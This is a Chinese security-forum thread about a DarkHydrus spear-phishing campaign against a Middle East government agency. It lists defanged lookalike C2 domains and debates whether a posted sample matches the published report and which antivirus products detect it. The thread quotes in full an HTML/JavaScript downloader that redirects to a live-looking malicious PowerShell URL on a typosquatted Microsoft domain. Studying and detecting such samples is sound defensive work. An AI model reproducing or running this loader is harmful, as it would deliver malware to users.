DarkHydrus针对中东政府发起攻击部分样本

275751198

攻击者在7月15日到16日之间发送了鱼叉式网络钓鱼电子邮件。DarkHydrus小组利用恶意.iqy文件对至少一个中东政府机构进行了攻击。 .iqy文件利用的是Excel下载电子表格中所包含的远程服务器内容的机制。 DarkHydrus利用这种不起眼的文件格式来运行命令，最终安装PowerShell脚本以获得对系统的后门访问。
该组织使用的多个域名，每个域名都模仿了现有技术厂商的合法域名，安全厂商尤甚。
Anyconnect[.]stream
Bigip[.]stream
Fortiweb[.]download
Kaspersky[.]science
microtik[.]stream
owa365[.]bid
symanteclive[.]download
windowsdefender[.]win
这些C2服务器解析出来的IP地址均出自中国的1.2.9.0/24





楼主认错，样本只是根据报告里的地址下载的，没有详细检验是否与报告里的文件一致。大概率是已经失效的文件

Picca

<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://micrrosoft.net/winupdate.ps1?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqcyI6MX0.fADWc9hUOlh58R9UzufQBROmie3I7c7vE835oE6YmU4&uuid=2bf6264c-9951-11e8-b0a0-3a85dfd28002');</script></body></html>

windows默认restricted 策略拦截，修改为remotesigned 仍然报错，确定这个ps1文件是用powershell执行的？
直接访问上面那段中的micrrosoft链接，卡巴拦截下载

事实证明这个文件就是错的，根本不是文章https://www.anquanke.com/post/id/154024中的那个powershell文件，
这个是楼主的
https://www.virustotal.com/#/file/eb661b6471c74f45559de951e474b3da2f8987d0a86804ecaf9c98e26d64088c/detection
这个是文章中的
https://www.virustotal.com/#/file/36862f654c3356d2177b5d35a410c78ff9803d1d7d20da0b82e3d69d640e856e/detection



某人最后的回复，也间接承认了楼主的文件，虽然是ps1后缀，但是由于并不是powershell语句，所以不管是什么Set-ExecutionPolicy策略，是不是管理员权限，也绝对无法被powershell执行。注意了，帖子的文件无法被powershell执行，所以各位的安软不报毒，是很正常的。

B100D1E55

ELOHIM 发表于 2018-8-6 22:52
你说的我都理解。

我不知道你理不理解k神把一段html代码放到ps1执行来执行去提示出错后的沮丧。

其实这个事情本质是：

楼主的样本是一个非常简单的js loader，这个样本报毒和不报毒都可以算合理：
1） 因为这个loader内含已知恶意链接，所以对loader报毒可能是合理的。最简单的方法就是你把那个文件里链接改掉后看看微软还报不报，如果还报的话则说明对downloader检测过分激进，不报的话算是合理入库
2）一些厂商觉得报这种简单loader太generic，所以选择对下载下来的ps1报毒，所以这种情况下不入库loader也是合理的
3）更别提有些厂商可以只针对loader加载的URL拉黑……
对URL或者loader拉黑的主要问题在于loader指向的文件可以变化。我今天把链接指向黑文件，明天可能指向白文件就成了误报。很多网站被误报也是因为曾有过被入侵挂马的历史然后被杀软拉黑，之后解决后杀软却没及时拉白……所以我觉得拉黑URL这种是应急手段，但不能作为首要检测手段

迷惘的执著

国内两朵云都报安全

hackernet

360，Avast，小红伞miss，应该不是双击使用吧，html语句

wk2534425660

后门访问？关键就是盗取文件呗！

温馨小屋

KES11 miss

ELOHIM

Karna 发表于 2018-8-6 17:46
Loading...window.location.replace('http://micrrosoft.net/winupdate.ps1?js=eyJhbGciOiJIUzI1NiIsInR5cC ...

windows默认restricted 策略拦截

这个是什么啊。。。
——————————————
我想起来了，是10的powershell执行限制。
已了解。用7太久，不知魏晋。

ELOHIM

hackernet 发表于 2018-8-6 16:52
360，Avast，小红伞miss，应该不是双击使用吧，html语句

微软识别为：TrojanDownloader:BAT/Bynoco

Picca

ELOHIM 发表于 2018-8-6 18:28
windows默认restricted 策略拦截

这个是什么啊。。。

https://blog.csdn.net/guyue35/article/details/51474685 自己看，你试试用powershell执行一下，我这里这个根本就不能运行

ELOHIM

Karna 发表于 2018-8-6 18:38
https://blog.csdn.net/guyue35/article/details/51474685 自己看，你试试用powershell执行一下， ...

四种模式你设置的是什么？？

我重新编辑了贴子。。